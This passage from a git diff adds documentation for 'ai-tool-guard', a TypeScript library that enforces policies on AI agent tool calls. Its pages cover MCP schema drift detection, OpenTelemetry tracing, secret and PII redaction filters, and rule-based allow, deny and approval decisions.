*/ + serverId: string; + /** SHA-256 of the canonical schema JSON. */ + schemaHash: string; + /** ISO-8601 timestamp when this fingerprint was pinned. */ + pinnedAt: string; + /** Optional environment tag (e.g. "production", "staging"). */ + environment?: string; +} +``` + +### `McpDriftResult` + +```typescript +interface McpDriftResult { + /** True if any tool schemas changed or new unpinned tools appeared. */ + drifted: boolean; + /** Details for each drifted tool. */ + changes: McpDriftChange[]; +} +``` + +### `McpDriftChange` + +```typescript +interface McpDriftChange { + toolName: string; + serverId: string; + /** The hash stored in the pin. "(not pinned)" for new unknown tools. */ + expectedHash: string; + /** The hash computed from the live schema. */ + actualHash: string; + /** Human-readable description of what changed and how to fix it. */ + remediation: string; +} +``` + +The `remediation` string is ready to log or display to a developer. It identifies the server and tool by name, shows the first 12 characters of both hashes for visual comparison, and instructs the developer to call `pinFingerprint()` after reviewing the change. + +--- + +## `FingerprintStore` + +`FingerprintStore` is an in-memory reference implementation for managing pinned fingerprints. For production deployments, use `export()` and `import()` to persist to a file, database, or secret store. + +```typescript +import { FingerprintStore } from 'ai-tool-guard/mcp'; + +const store = new FingerprintStore(); +``` + +### Methods + +| Method | Signature | Description | +|---|---|---| +| `set` | `(fp: McpToolFingerprint) => void` | Adds or replaces a pinned fingerprint. | +| `get` | `(serverId: string, toolName: string) => McpToolFingerprint \| undefined` | Retrieves a single pin by server and tool name. | +| `getAll` | `() => McpToolFingerprint[]` | Returns all pinned fingerprints as an array. | +| `delete` | `(serverId: string, toolName: string) => boolean` | Removes a pin. Returns `true` if it existed. | +| `export` | `() => string` | Serializes all fingerprints to a pretty-printed JSON string. | +| `import` | `(json: string) => void` | Loads fingerprints from a JSON string, validating each entry. | + +### Persistence with `export()` and `import()` + +```typescript +import fs from 'node:fs'; + +// Save to disk. +fs.writeFileSync('fingerprints.json', store.export()); + +// Load on next startup. +const stored = new FingerprintStore(); +stored.import(fs.readFileSync('fingerprints.json', 'utf-8')); +``` + +`import()` validates that every entry in the JSON array has non-empty `toolName`, `serverId`, `schemaHash`, and `pinnedAt` string fields. Malformed entries throw an `Error` identifying the index of the invalid entry. + +!!! warning + `FingerprintStore` is an in-memory store. Data is lost when the process exits unless you call `export()` and persist the result. Plan your persistence strategy before deploying. + +--- + +## Advanced Examples + +### CI/CD Schema Validation + +Run drift detection as a pre-deployment check. Fail the pipeline if any tool schema changed since the last pin. + +```typescript +// scripts/check-mcp-drift.ts +import fs from 'node:fs'; +import { FingerprintStore, detectDrift } from 'ai-tool-guard/mcp'; +import { fetchToolSchemas } from './mcp-client.js'; + +const store = new FingerprintStore(); +store.import(fs.readFileSync('fingerprints.json', 'utf-8')); + +const liveSchemas = await fetchToolSchemas(); +const result = await detectDrift(store.getAll(), liveSchemas); + +if (result.drifted) { + console.error('MCP schema drift detected:'); + for (const change of result.changes) { + console.error(` [${change.serverId}] ${change.toolName}`); + console.error(` Expected: ${change.expectedHash.slice(0, 12)}...`); + console.error(` Actual: ${change.actualHash.slice(0, 12)}...`); + console.error(` ${change.remediation}`); + } + process.exit(1); +} + +console.log('All MCP tool schemas match pinned fingerprints.'); +``` + +### Runtime Drift Checking + +Check for drift at agent startup, before any tool calls are made, and block execution if drift is found: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { FingerprintStore, detectDrift } from 'ai-tool-guard/mcp'; +import { fetchToolSchemas } from './mcp-client.js'; + +async function createGuardedAgent() { + const store = new FingerprintStore(); + store.import(loadPersistedFingerprints()); + + const liveSchemas = await fetchToolSchemas(); + const driftResult = await detectDrift(store.getAll(), liveSchemas); + + if (driftResult.drifted) { + throw new Error( + `MCP schema drift detected on ${driftResult.changes.length} tool(s). ` + + `Re-pin schemas after review.` + ); + } + + return createToolGuard({ rules: [...] }); +} +``` + +### Multi-Environment Pinning + +Pin the same tool separately for `production` and `staging` environments, which may expose different schema versions: + +```typescript +import { pinFingerprint, FingerprintStore } from 'ai-tool-guard/mcp'; + +const store = new FingerprintStore(); + +// Pin production schema. +store.set(await pinFingerprint('sendEmail', 'email-server', prodSchema, 'production')); + +// Pin staging schema (may differ during a rollout). +store.set(await pinFingerprint('sendEmail', 'email-server', stagingSchema, 'staging')); + +// The store keys on serverId + toolName, so both coexist. +// Filter by environment when running drift checks: +const prodPins = store.getAll().filter(fp => fp.environment === 'production'); +``` + +--- + +## How It Works + +1. `computeFingerprint` takes the tool name and schema, wraps them in a deterministic object `{ toolName, schema }`, then passes it through `canonicalize()` — a recursive key-sorting serializer — before computing SHA-256 via the Node `crypto` module. +2. `pinFingerprint` calls `computeFingerprint` and wraps the result in a `McpToolFingerprint` record stamped with the current ISO-8601 time. +3. `detectDrift` builds an internal lookup map keyed on `"${serverId}:${toolName}"`. For each live schema, it looks up the corresponding pin. If the pin is missing, the tool is flagged as unknown. If the pin exists but the hashes differ, the tool is flagged as changed. +4. For each mismatch, a `McpDriftChange` is constructed with the expected and actual hashes and a remediation string that includes the pin timestamp for easy auditing. +5. The final `McpDriftResult` sets `drifted: true` if the `changes` array is non-empty. + +--- + +## Related + +- [API Reference — MCP](../api/mcp.md) diff --git a/docs/guides/opentelemetry.md b/docs/guides/opentelemetry.md new file mode 100644 index 0000000..35eea57 --- /dev/null +++ b/docs/guides/opentelemetry.md @@ -0,0 +1,251 @@ +# OpenTelemetry Integration + +## Overview + +ai-tool-guard emits structured OpenTelemetry spans for every significant stage of tool execution: policy evaluation, approval waiting, tool execution, injection detection, rate limiting, and output filtering. Spans are annotated with semantic attributes that map directly to the domain model, making traces immediately useful in tools like Jaeger, Grafana Tempo, or any OTLP-compatible backend. + +OpenTelemetry support is entirely optional. `@opentelemetry/api` is a peer dependency. When it is not installed, the library uses an internal no-op tracer with zero overhead — no exceptions, no warnings, no branching in your application code. + +--- + +## Basic Usage + +Install the peer dependency alongside your OTel SDK setup: + +```bash +npm install @opentelemetry/api +``` + +Enable tracing in `createToolGuard`: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +const guard = createToolGuard({ + rules: [...], + otel: { + enabled: true, + tracerName: 'my-agent', + defaultAttributes: { + 'service.name': 'my-ai-service', + 'deployment.environment': 'production', + }, + }, +}); +``` + +ai-tool-guard picks up whatever OTel SDK and exporter you have configured globally. The library does not configure exporters itself. + +--- + +## Configuration Options + +The `otel` key in `GuardOptions` accepts an `OtelConfig` object: + +```typescript +export interface OtelConfig { + /** Whether tracing is enabled. Default: true when OTel API is available. */ + enabled?: boolean; + /** Custom tracer name registered with the OTel TracerProvider. Default: "ai-tool-guard". */ + tracerName?: string; + /** Additional span attributes merged into every span emitted by the library. */ + defaultAttributes?: Record; +} +``` + +| Field | Type | Default | Description | +|---|---|---|---| +| `enabled` | `boolean` | `true` | Set to `false` to force the no-op tracer even when `@opentelemetry/api` is installed. | +| `tracerName` | `string` | `"ai-tool-guard"` | The name passed to `trace.getTracer()`. Appears in span instrumentation scope metadata. | +| `defaultAttributes` | `Record` | `{}` | Static attributes merged into every span. Useful for service name, environment, tenant ID, etc. | + +--- + +## Span Catalog + +The library emits the following spans. All span names are prefixed with `ai_tool_guard.`. + +| Span Name | When Emitted | Key Attributes | +|---|---|---| +| `ai_tool_guard.policy_eval` | After every policy evaluation, before the verdict is acted on | `tool.name`, `tool.risk_level`, `tool.risk_categories`, `decision.verdict`, `decision.reason`, `decision.matched_rules`, `decision.dry_run` | +| `ai_tool_guard.tool_execute` | Wraps the actual tool `execute()` call | `tool.name` | +| `ai_tool_guard.approval_wait` | Wraps the approval handler call for `require-approval` verdicts | `tool.name`, `approval.token_id`, `approval.approved`, `approval.patched` | +| `ai_tool_guard.injection_check` | When injection detection fires and a suspected injection is detected | `injection.score`, `injection.suspected` | +| `ai_tool_guard.rate_limit` | When a rate limit check rejects a call | `rate_limit.allowed` | +| `ai_tool_guard.output_filter` | When an output filter runs and either redacts or blocks the result | `output.redacted`, `output.blocked` | + +!!! note + The `policy_eval` span is set to error status (`SpanStatusCode.ERROR`) when the verdict is `deny`, making denied calls immediately visible in trace UIs without custom queries. + +--- + +## Semantic Attribute Keys + +All attribute keys are available via the exported `ATTR` constant object. Import it to avoid relying on raw strings: + +```typescript +import { ATTR } from 'ai-tool-guard/otel'; +``` + +The full set of 16 attributes: + +| Constant | Attribute Key | Value Type | Description | +|---|---|---|---| +| `ATTR.TOOL_NAME` | `ai_tool_guard.tool.name` | `string` | Name of the guarded tool | +| `ATTR.TOOL_RISK_LEVEL` | `ai_tool_guard.tool.risk_level` | `string` | Evaluated risk level (`low`, `medium`, `high`, `critical`) | +| `ATTR.TOOL_RISK_CATEGORIES` | `ai_tool_guard.tool.risk_categories` | `string` | Comma-separated list of risk categories | +| `ATTR.DECISION_VERDICT` | `ai_tool_guard.decision.verdict` | `string` | `allow`, `deny`, or `require-approval` | +| `ATTR.DECISION_REASON` | `ai_tool_guard.decision.reason` | `string` | Human-readable explanation from the policy engine | +| `ATTR.DECISION_MATCHED_RULES` | `ai_tool_guard.decision.matched_rules` | `string` | Comma-separated matched rule IDs | +| `ATTR.DECISION_DRY_RUN` | `ai_tool_guard.decision.dry_run` | `boolean` | Whether this was a dry-run evaluation | +| `ATTR.APPROVAL_TOKEN_ID` | `ai_tool_guard.approval.token_id` | `string` | Approval token ID for correlation | +| `ATTR.APPROVAL_APPROVED` | `ai_tool_guard.approval.approved` | `boolean` | Whether the approval was granted | +| `ATTR.APPROVAL_PATCHED` | `ai_tool_guard.approval.patched` | `boolean` | Whether arguments were patched during approval | +| `ATTR.INJECTION_SCORE` | `ai_tool_guard.injection.score` | `number` | Suspicion score from 0 to 1 | +| `ATTR.INJECTION_SUSPECTED` | `ai_tool_guard.injection.suspected` | `boolean` | Whether a prompt injection was detected | +| `ATTR.RATE_LIMIT_ALLOWED` | `ai_tool_guard.rate_limit.allowed` | `boolean` | Whether the call was within rate limits | +| `ATTR.OUTPUT_REDACTED` | `ai_tool_guard.output.redacted` | `boolean` | Whether output fields were redacted | +| `ATTR.OUTPUT_BLOCKED` | `ai_tool_guard.output.blocked` | `boolean` | Whether the output was blocked entirely | +| `ATTR.MCP_DRIFT_DETECTED` | `ai_tool_guard.mcp.drift_detected` | `boolean` | Whether MCP schema drift was detected | + +--- + +## Span Helper Functions + +The following functions are exported from the tracing module for cases where you need to integrate with custom instrumentation. + +### `createTracer(config?: OtelConfig): Tracer` + +Attempts a dynamic `require('@opentelemetry/api')` using Node's `createRequire` for ESM compatibility. Returns the real OTel tracer if the package is available, or a no-op tracer otherwise. The result is cached after the first call for the same `tracerName`. + +```typescript +import { createTracer } from 'ai-tool-guard/otel'; + +const tracer = createTracer({ tracerName: 'my-component' }); +const span = tracer.startSpan('my.operation'); +// ... do work ... +span.end(); +``` + +### `spanFromDecision(tracer, record, config?): Span` + +Creates an `ai_tool_guard.policy_eval` span populated from a `DecisionRecord`. The span status is set to ERROR when `record.verdict === 'deny'`. The caller is responsible for calling `.end()` on the returned span. + +### `startToolExecutionSpan(tracer, toolName, config?): Span` + +Creates an `ai_tool_guard.tool_execute` span for the given tool name. `defaultAttributes` from the config are merged in. Call `.end()` after the tool completes. + +### `startApprovalSpan(tracer, toolName, tokenId, config?): Span` + +Creates an `ai_tool_guard.approval_wait` span scoped to a specific token ID. Useful for measuring how long a human approval interaction takes. + +--- + +## No-Op Behavior + +When `@opentelemetry/api` is not installed, all tracing calls resolve to internal `NoopSpan` and `NoopTracer` instances whose methods are empty functions. There is no `try/catch` in the hot path — the import attempt happens once at guard construction time and the result is cached. + +Setting `otel: { enabled: false }` explicitly forces the no-op tracer regardless of whether the package is installed. Use this in unit tests to eliminate any OTel initialization side effects. + +!!! tip + You do not need to guard OTel calls with `if (otelEnabled)` checks in your application code. The no-op tracer makes the same public interface available at zero cost. + +--- + +## Advanced Examples + +### Connecting to Jaeger + +Configure the OTel Node SDK with an OTLP HTTP exporter before creating the guard. ai-tool-guard picks up the registered `TracerProvider` automatically. + +```typescript +import { NodeSDK } from '@opentelemetry/sdk-node'; +import { OTLPTraceExporter } from '@opentelemetry/exporter-trace-otlp-http'; +import { createToolGuard } from 'ai-tool-guard'; + +const sdk = new NodeSDK({ + serviceName: 'my-ai-service', + traceExporter: new OTLPTraceExporter({ + url: 'http://localhost:4318/v1/traces', + }), +}); + +sdk.start(); + +const guard = createToolGuard({ + rules: [...], + otel: { + enabled: true, + tracerName: 'my-ai-service', + defaultAttributes: { + 'deployment.environment': 'production', + }, + }, +}); +``` + +### Custom Span Enrichment via `onDecision` + +Use `onDecision` alongside `createTracer` to add application-specific attributes to child spans that the library does not produce by default: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; +import { createTracer, ATTR } from 'ai-tool-guard/otel'; + +const tracer = createTracer({ tracerName: 'my-app-enrichment' }); + +const guard = createToolGuard({ + rules: [...], + otel: { enabled: true }, + onDecision: (record) => { + const span = tracer.startSpan('my_app.tool_decision', { + attributes: { + [ATTR.TOOL_NAME]: record.toolName, + [ATTR.DECISION_VERDICT]: record.verdict, + // Application-specific attributes beyond the default set. + 'my_app.tenant_id': String(record.attributes['tenantId'] ?? 'unknown'), + 'my_app.eval_ms': record.evalDurationMs, + }, + }); + span.end(); + }, +}); +``` + +### Multi-Tenant Attribute Injection + +Use `defaultAttributes` with a per-request guard factory to attach tenant context to every span: + +```typescript +import { createToolGuard } from 'ai-tool-guard'; + +function createTenantGuard(tenantId: string) { + return createToolGuard({ + rules: [...], + otel: { + enabled: true, + defaultAttributes: { + 'tenant.id': tenantId, + 'service.name': 'ai-service', + }, + }, + }); +} +``` + +--- + +## How It Works + +1. `createToolGuard` calls `createTracer(options.otel)`, which attempts `require('@opentelemetry/api')` once using `createRequire(import.meta.url)` for ESM/CJS compatibility, then caches the result. +2. During each tool invocation, the guard's internal pipeline calls the span helper functions at the appropriate stage. +3. Each helper opens a span with pre-populated attributes drawn from the `DecisionRecord` or the current tool call context, merging in `defaultAttributes` if configured. +4. Spans are ended immediately after their stage completes. The `tool_execute` span wraps the actual `execute()` call inside a `try/finally` block so it closes even on error. +5. The OTel SDK propagates spans to the configured exporter via its background batch processor, with no synchronous I/O in the hot path. + +--- + +## Related + +- [API Reference — OTel](../api/otel.md) +- [Decision Records](decision-records.md) diff --git a/docs/guides/output-filtering.md b/docs/guides/output-filtering.md new file mode 100644 index 0000000..b9d9e1e --- /dev/null +++ b/docs/guides/output-filtering.md @@ -0,0 +1,268 @@ +# Output Filtering + +Output filters run after a tool executes and before the result is returned to the model. They give you egress control over what the model sees: secrets can be redacted, PII can be removed, and specific categories of output can be blocked entirely. Filters compose into a chain, each receiving the output of the previous one. + +## Overview + +Register filters via the `outputFilters` array on `ToolGuardConfig`. The chain runs in declaration order. Each filter can return one of three verdicts: + +- **`pass`** — Output is clean; pass it to the next filter unchanged (or return it if this is the last filter). +- **`redact`** — Output was modified; the transformed output continues through the chain. +- **`block`** — Output is suppressed entirely. Execution short-circuits; no further filters run. + +Redacted field names are accumulated across all filters and recorded in the `DecisionRecord.redactions` array for audit purposes. + +## Basic Usage + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { piiOutputFilter, secretsFilter } from "ai-tool-guard/guards"; + +const guard = createToolGuard(); + +const wrappedUserLookup = guard.guardTool("userLookup", userLookupTool, { + riskLevel: "high", + riskCategories: ["data-read", "pii"], + outputFilters: [ + secretsFilter(), // Strip secrets first. + piiOutputFilter(), // Then strip remaining PII. + ], +}); +``` + +## Configuration Options + +### `secretsFilter(extraRules?)` + +Redacts common secrets from string output using pattern matching. The built-in rules cover the most prevalent secret formats: + +| Rule Name | Pattern | +|---|---| +| `aws-key` | `AKIA...` and `ASIA...` IAM key prefixes (20-char) | +| `github-token` | `ghp_`, `gho_`, `ghu_`, `ghs_`, `ghr_` tokens | +| `jwt` | Three-segment base64url JWT (`eyJ...`) | +| `generic-api-key` | `api_key`, `apikey`, `secret_key` assignments with long values | +| `bearer-token` | `Bearer ` authorization headers | +| `private-key` | PEM-encoded RSA and EC private key blocks | + +Matched content is replaced with `[REDACTED]` by default. + +```typescript +import { secretsFilter } from "ai-tool-guard/guards"; +import type { RedactionRule } from "ai-tool-guard/guards"; + +// Use with no arguments for default rules only. +secretsFilter(); + +// Extend with project-specific secret patterns. +const customRule: RedactionRule = { + name: "stripe-key", + pattern: /sk_(live|test)_[A-Za-z0-9]{24,}/g, + replacement: "[STRIPE KEY REDACTED]", +}; +secretsFilter([customRule]); +``` + +### `piiOutputFilter(opts?)` + +Redacts PII from string output. By default all four PII types are active. Pass `allowedTypes` to suppress redaction for specific types. + +| Type | Replacement | +|---|---| +| `email` | `[EMAIL REDACTED]` | +| `ssn` | `[SSN REDACTED]` | +| `phone` | `[PHONE REDACTED]` | +| `credit-card` | `[CARD REDACTED]` (Luhn-validated matches only) | + +```typescript +import { piiOutputFilter } from "ai-tool-guard/guards"; + +// Redact all PII types. +piiOutputFilter(); + +// Allow emails through but redact everything else. +piiOutputFilter({ allowedTypes: ["email"] }); +``` + +Credit card redaction uses Luhn validation to confirm a match is a real card number before redacting it. This prevents over-redaction of numeric strings that pattern-match but are not valid card numbers. + +### `customFilter(name, fn)` + +Create a filter from any function. Use this for domain-specific logic, content classification, size limiting, or any check that the built-in filters do not cover. + +```typescript +import { customFilter } from "ai-tool-guard/guards"; +import type { OutputFilterResult, PolicyContext } from "ai-tool-guard"; + +const sizeLimitFilter = customFilter( + "size-limit", + async (result: unknown, ctx: PolicyContext): Promise => { + const serialized = JSON.stringify(result); + if (serialized.length > 100_000) { + return { verdict: "block", output: null }; + } + return { verdict: "pass", output: result }; + }, +); +``` + +The function signature is: + +```typescript +fn(result: unknown, ctx: PolicyContext): Promise +``` + +`ctx` gives you access to `toolName`, `args`, `userAttributes`, and conversation context — useful for applying different redaction rules based on the caller's role or the tool being called. + +### `runOutputFilters(filters, result, ctx)` + +The chain runner. Typically called internally by the guard engine, but exposed for testing and custom integration: + +```typescript +import { runOutputFilters } from "ai-tool-guard/guards"; + +const chainResult = await runOutputFilters( + [secretsFilter(), piiOutputFilter()], + rawToolOutput, + ctx, +); + +// chainResult.output — final (possibly redacted) value +// chainResult.redactedFields — e.g. ["secrets-filter:aws-key", "pii-output-filter:email"] +// chainResult.blocked — true if any filter returned "block" +// chainResult.blockedBy — name of the filter that blocked (if blocked) +``` + +## `OutputFilterResult` + +Each filter returns: + +```typescript +interface OutputFilterResult { + verdict: "pass" | "redact" | "block"; + output: unknown; // The (possibly transformed) value. + redactedFields?: string[]; // Names of redacted patterns. +} +``` + +When the chain completes, `runOutputFilters` returns an `OutputFilterChainResult`: + +```typescript +interface OutputFilterChainResult { + output: unknown; + redactedFields: string[]; // Prefixed with filter name: "secrets-filter:aws-key". + blocked: boolean; + blockedBy?: string; // Filter name, if blocked. +} +``` + +## Redaction Mechanics + +The internal `redactValue` function applies rules recursively across the full output structure: + +- **Strings** — each pattern is tested and matched substrings are replaced in-place. +- **Arrays** — each element is processed independently and recursively. +- **Objects** — each property value is processed recursively; keys are not inspected. +- **Other types** — numbers, booleans, and `null` pass through unchanged. + +For rules with a `validate` function (currently credit-card Luhn validation), a replacer function is used so that each regex match is individually validated before replacement. Only matches that pass validation are redacted. + +!!! note "Global flag required for pattern rules" + Patterns used in `SecretRule` and the built-in PII rules are compiled with the `g` (global) flag. If you supply custom `RedactionRule` patterns without the `g` flag, only the first match per string will be replaced. Always use `g` in `RedactionRule.pattern`. + +## Advanced Examples + +### Blocking Output Above a Size Threshold + +Prevent large tool results from being fed back to the model, which could exhaust context or be used for exfiltration: + +```typescript +import { createToolGuard } from "ai-tool-guard"; +import { customFilter, secretsFilter } from "ai-tool-guard/guards"; + +const guard = createToolGuard(); + +const wrappedFileTool = guard.guardTool("readFile", readFileTool, { + riskLevel: "medium", + outputFilters: [ + secretsFilter(), + customFilter("size-guard", async (result) => { + const size = JSON.stringify(result).length; + if (size > 50_000) { + return { + verdict: "block", + output: null, + // blockedBy will be set to "size-guard" in the chain result. + }; + } + return { verdict: "pass", output: result }; + }), + ], +}); +``` + +### Domain-Specific Redaction with Custom Rules + +Extend `secretsFilter` with patterns specific to your infrastructure: + +```typescript +import { secretsFilter } from "ai-tool-guard/guards"; +import type { RedactionRule } from "ai-tool-guard/guards"; + +const internalTokenRule: RedactionRule = { + name: "internal-service-token", + pattern: /svc_[A-Za-z0-9]{32}/g, + replacement: "[SERVICE TOKEN REDACTED]", +}; + +const dbConnectionStringRule: RedactionRule = { + name: "db-connection-string", + pattern: /postgresql:\/\/[^\s"']+/g, + replacement: "[DB URL REDACTED]", +}; + +const filter = secretsFilter([internalTokenRule, dbConnectionStringRule]); +``` + +### Role-Based Redaction with a Custom Filter + +Use `ctx.userAttributes` to apply different redaction based on who is calling: + +```typescript +import { customFilter } from "ai-tool-guard/guards"; + +const roleBasedPiiFilter = customFilter( + "role-based-pii", + async (result, ctx) => { + const role = ctx.userAttributes.role as string | undefined; + if (role === "admin") { + // Admins see the raw output. + return { verdict: "pass", output: result }; + } + // All other roles get PII stripped. + const { piiOutputFilter, runOutputFilters } = await import("ai-tool-guard/guards"); + const inner = await runOutputFilters([piiOutputFilter()], result, ctx); + return { + verdict: inner.redactedFields.length > 0 ? "redact" : "pass", + output: inner.output, + redactedFields: inner.redactedFields, + }; + }, +); +``` + +## How It Works + +1. After a tool executes successfully, the guard engine calls `runOutputFilters(filters, rawResult, ctx)`. +2. The runner iterates over `filters` in order, passing the current output to each `filter.filter(current, ctx)`. +3. If a filter returns `verdict: "block"`, the runner immediately returns `{ output: null, blocked: true, blockedBy: filter.name }`. No further filters run. +4. If a filter returns `verdict: "redact"`, its `output` becomes the input for the next filter and its `redactedFields` are prefixed with the filter name and appended to `allRedacted`. +5. If a filter returns `verdict: "pass"`, its `output` (unchanged or transformed) becomes the input for the next filter. +6. After all filters complete, the final `output` is returned to the caller and `allRedacted` is written to `DecisionRecord.redactions`. + +## Related + +- [API Reference — Guards](../api/guards.md) +- [Argument Validation](argument-validation.md) +- [Decision Records](decision-records.md) +- [Injection Detection](injection-detection.md) diff --git a/docs/guides/policy-engine.md b/docs/guides/policy-engine.md new file mode 100644 index 0000000..faabb3f --- /dev/null +++ b/docs/guides/policy-engine.md @@ -0,0 +1,227 @@ +# Policy Engine + +The policy engine is the core decision-making component of `ai-tool-guard`. It evaluates every tool call against a set of rules and an optional external backend, producing a `DecisionRecord` that explains why a call was allowed, denied, or sent for approval. + +## Overview + +When a guarded tool is invoked, the engine runs the following pipeline: + +1. Resolve the tool's `riskLevel` (from per-tool config or `defaultRiskLevel`). +2. If a `PolicyBackend` is configured, delegate to it first. +3. Evaluate the built-in `PolicyRule` list in priority order. +4. Merge results using escalation semantics: `deny` > `require-approval` > `allow`. +5. Return a `DecisionRecord` capturing the verdict, matched rules, duration, and reason. + +The default verdict when no rule matches is `"allow"`. + +## Basic Usage + +Pass an array of `PolicyRule` objects (or use a preset such as `defaultPolicy()`) when creating your guard: + +```ts +import { createToolGuard, defaultPolicy } from "ai-tool-guard"; + +const guard = createToolGuard({ + rules: defaultPolicy(), + onDecision: (record) => { + console.log(`[${record.verdict}] ${record.toolName} — ${record.reason}`); + }, +}); +``` + +Rules can also be written by hand: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +const rules: PolicyRule[] = [ + { + id: "deny-delete-tools", + description: "Block all deletion tools unconditionally.", + toolPatterns: ["*delete*", "*remove*", "*drop*"], + verdict: "deny", + priority: 100, + }, + { + id: "allow-reads", + description: "Allow all read-only tools.", + toolPatterns: ["read*", "get*", "list*", "search*"], + verdict: "allow", + priority: 10, + }, +]; + +const guard = createToolGuard({ rules }); +``` + +## Configuration Options + +### `PolicyRule` + +| Property | Type | Required | Description | +|---|---|---|---| +| `id` | `string` | Yes | Stable identifier included in `DecisionRecord.matchedRules`. | +| `toolPatterns` | `string[]` | Yes | Glob patterns matched against the tool name. | +| `verdict` | `DecisionVerdict` | Yes | One of `"allow"`, `"deny"`, or `"require-approval"`. | +| `riskLevels` | `RiskLevel[]` | No | When set, the rule only applies to tools at these risk levels. | +| `condition` | `(ctx: PolicyContext) => boolean \| Promise` | No | Predicate for attribute- or context-based matching. Supports async. | +| `priority` | `number` | No | Evaluation order. Higher values are evaluated first. Default `0`. | +| `description` | `string` | No | Human-readable description recorded in `DecisionRecord.reason`. | + +### Glob Pattern Matching + +Tool names are matched against each pattern in `toolPatterns` using a minimal glob matcher. The pattern is anchored at both ends. + +| Wildcard | Matches | +|---|---| +| `*` | Any sequence of characters, including the empty string. | +| `?` | Exactly one character. | + +```ts +"*" // matches every tool name +"db.*" // matches "db.query", "db.insert", "db.delete" +"read*" // matches "readFile", "readStream" but not "canRead" +"*File" // matches "readFile", "writeFile", "deleteFile" +"get?sers" // matches "getUsers"; the ? substitutes exactly one character +``` + +!!! tip "Dot characters are literal" + The dot (`.`) in a glob pattern matches a literal dot, not any character. Use `db.*` to match namespaced tool names such as `db.query` without matching `dbquery`. + +### Risk Level Filtering + +When `riskLevels` is set on a rule, the rule is skipped for tools that do not match one of the listed levels: + +```ts +const rules: PolicyRule[] = [ + { + id: "approve-medium-risk", + toolPatterns: ["*"], + riskLevels: ["medium"], + verdict: "require-approval", + priority: 0, + }, +]; +``` + +If `riskLevels` is omitted, the rule applies to tools at any risk level. + +### Priority and Escalation + +Rules are sorted by `priority` in descending order before evaluation. All matching rules are collected, and the most restrictive verdict wins across all matches: + +``` +deny > require-approval > allow +``` + +A high-priority `allow` rule does **not** suppress a lower-priority `deny` rule if both match. The engine accumulates every match and selects the strictest outcome. + +!!! info "All matched rules are recorded" + `DecisionRecord.matchedRules` lists every rule that matched, not only the one that determined the final verdict. This gives you a complete audit trail even when escalation occurs across multiple rules. + +## Advanced Examples + +### Role-Based Access Control + +Use `userAttributes` combined with a `condition` predicate to restrict tools based on the caller's role: + +```ts +import { createToolGuard } from "ai-tool-guard"; +import type { PolicyRule } from "ai-tool-guard"; + +const rules: PolicyRule[] = [ + { + id: "deny-admin-tools-for-non-admins", + description: "Block billing and admin tools for callers without the admin role.", + toolPatterns: ["billing.*", "admin.*"], + verdict: "deny", + priority: 50, + condition: (ctx) => { + const roles = ctx.userAttributes["roles"] as string[] | undefined; + return !roles?.includes("admin"); + }, + }, + { + id: "allow-admin-tools-for-admins", + description: "Admins may use billing and admin tools.", + toolPatterns: ["billing.*", "admin.*"], + verdict: "allow", + priority: 60, + condition: (ctx) => { + const roles = ctx.userAttributes["roles"] as string[] | undefined; + return roles?.includes("admin") ?? false; + }, + }, +]; + +const guard = createToolGuard({ + rules, + resolveUserAttributes: async () => { + return { roles: await getCurrentUserRoles() }; + }, +}); +``` + +### Time-Based Restrictions + +Async conditions let you query external data sources, including time-sensitive business logic: + +```ts +import type { PolicyRule } from "ai-tool-guard"; + +const businessHoursOnly: PolicyRule = { + id: "business-hours-only", + description: "Block payment tools outside of UTC 09:00–17:00.", + toolPatterns: ["payment.*", "charge*", "refund*"], + verdict: "deny", + priority: 80, + condition: async (_ctx) => { + const hour = new Date().getUTCHours(); + // Return true (condition met → rule fires) when outside business hours. + return hour < 9 || hour >= 17; + }, +}; +``` + +### Conversation-Aware Escalation + +Rules can inspect the conversation context to tighten policy after repeated failures in a session: + +```ts +import type { PolicyRule } from "ai-tool-guard"; + +const escalateAfterFailures: PolicyRule = { + id: "escalate-on-repeated-failures", + description: "Require approval for any tool after 3 prior failures in a session.", + toolPatterns: ["*"], + verdict: "require-approval", + priority: 200, + condition: (ctx) => { + return (ctx.conversation?.priorFailures ?? 0) >= 3; + }, +}; +``` + +## How It Works + +The evaluation function `evaluatePolicy` (in `src/policy/engine.ts`) runs in this sequence: + +1. **Risk resolution** — The tool's `riskLevel` is taken from `ToolGuardConfig.riskLevel`, falling back to `GuardOptions.defaultRiskLevel`, then to `"low"` if neither is set. + +2. **External backend** — If `GuardOptions.backend` is configured, `backend.evaluate(ctx)` is called and its result seeds the initial `verdict`, `reason`, `matchedRules`, and `attributes` fields on the record. + +3. **Built-in rules** — The rules array is sorted by `priority` descending. Each rule is tested in turn: glob match against `toolName`, then risk level filter, then the optional async `condition` predicate. Every matching rule is collected. + +4. **Escalation merge** — The built-in rules result is compared to the backend result. If the rules verdict is stricter, it replaces the backend verdict. Matched rule IDs from both sources are merged into `DecisionRecord.matchedRules`. + +5. **DecisionRecord construction** — A complete record is assembled with a unique `id`, ISO-8601 `timestamp`, final `verdict`, human-readable `reason`, merged `attributes`, `evalDurationMs`, and `dryRun` flag. + +!!! warning "The default verdict is allow" + If no rule matches and no backend is configured, the verdict is `"allow"`. Deploy `defaultPolicy()` or an explicit catch-all deny rule to avoid unintentional permissiveness in production environments. + +## Related + +- [Preset Policies](preset-policies.md) — ready-made rule bundles for common scenarios. +- [External Backends](external-backends.md) — delegate decisions to OPA, Cedar, or a custom service. +- [API Reference](../api/policy.md) — full type documentation for `PolicyRule`, `PolicyContext`, and `DecisionRecord`. diff --git a/docs/guides/preset-policies.md b/docs/guides/preset-policies.md new file mode 100644 index 0000000..a958995 --- /dev/null +++ b/docs/guides/preset-policies.md @@ -0,0 +1,208 @@ +# Preset Policies + +`ai-tool-guard` ships two preset policy functions and three builder functions that cover the most common access control patterns. Presets produce a `PolicyRule[]` array compatible with the `rules` option of `createToolGuard()` and can be composed freely. + +## Overview + +| Function | Purpose | +|---|---| +| `defaultPolicy()` | Risk-tier-based allow/approve/deny baseline. | +| `readOnlyPolicy(patterns)` | Allow specific read tools; deny everything else. | +| `allow(opts)` | Builder: create an allow rule. | +| `deny(opts)` | Builder: create a deny rule. | +| `requireApproval(opts)` | Builder: create a require-approval rule. | + +## Basic Usage + +### `defaultPolicy()` + +Returns three rules that map each risk tier to a sensible default verdict: + +| Risk level | Verdict | +|---|---| +| `low` | `allow` | +| `medium` | `require-approval` | +| `high` 